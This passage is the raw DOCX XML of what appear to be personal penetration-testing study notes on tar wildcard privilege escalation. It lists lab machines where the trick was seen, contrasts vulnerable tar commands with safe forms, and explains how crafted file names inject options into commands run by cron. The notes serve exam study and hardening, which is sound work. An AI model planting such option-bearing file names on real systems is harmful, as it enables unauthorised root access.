          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In both writeups I read, they both mentioned this hacktricks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002504">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId786">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/wildcards-spare-tricks.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002505">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002506">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002507">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—--------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002508">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5vfkyewr45j3" w:id="326"/>
      <w:bookmarkEnd w:id="326"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash Gobbling or Linux tar wildcard (globbing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002509">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick explanation of it: </w:t>
      </w:r>
      <w:hyperlink r:id="rId787">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@polygonben/linux-privilege-escalation-wildcards-with-tar-f79ab9e407fa</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-C .157</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId788">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cockpit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId789">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</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50F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play Amaterasu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002510">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002511">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002512">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some quick facts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the specific tar mode flag (czf, -zxf, etc.) doesn’t matter for the wildcard/globbing exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002514">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002515">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002516">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable vs. non-vulnerable (safe):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002519">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar -zxf /tmp/backup.tar.gz /opt/admin/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, you have to put the "--" files in /opt/admin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf out.tgz some/dir/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generally safe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/backup.tar.gz -- * ← -- stops option parsing of later --… filenames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/backup.tar.gz . ← no glob; tar walks the tree itself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar -C /path -czf /tmp/backup.tar.gz .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find . -print0 | tar --null -T - -czf /tmp/backup.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quote to avoid globbing by the shell (e.g., '*'), though that usually defeats the intent of including files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002522">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002523">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002524">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4305300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="182" name="image175.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image175.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId790"/>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525">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002526">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also saw this in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tib3rius Cron Jobs video</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002527">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3762375" cy="733425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="179" name="image180.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image180.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId791"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="37623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2528">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="831"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was a file ran by cron job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002529">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how they explained it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When a wildcard character (*) is provided to a command as part of an argument, the shell will first perform filename expansion (also known as globbing) on the wildcard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This process replaces the wildcard with a space-separated list of the file and directory names in the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An easy way to see this in action is to run the following command from your home directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002530">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002531">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002532">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wildcards &amp; Filenames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002533">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since filesystems in Linux are generally very permissive with filenames, and filename expansion happens before the command is executed, it is possible to pass command line options (e.g. -h, --help) to commands by creating files with these names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002534">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
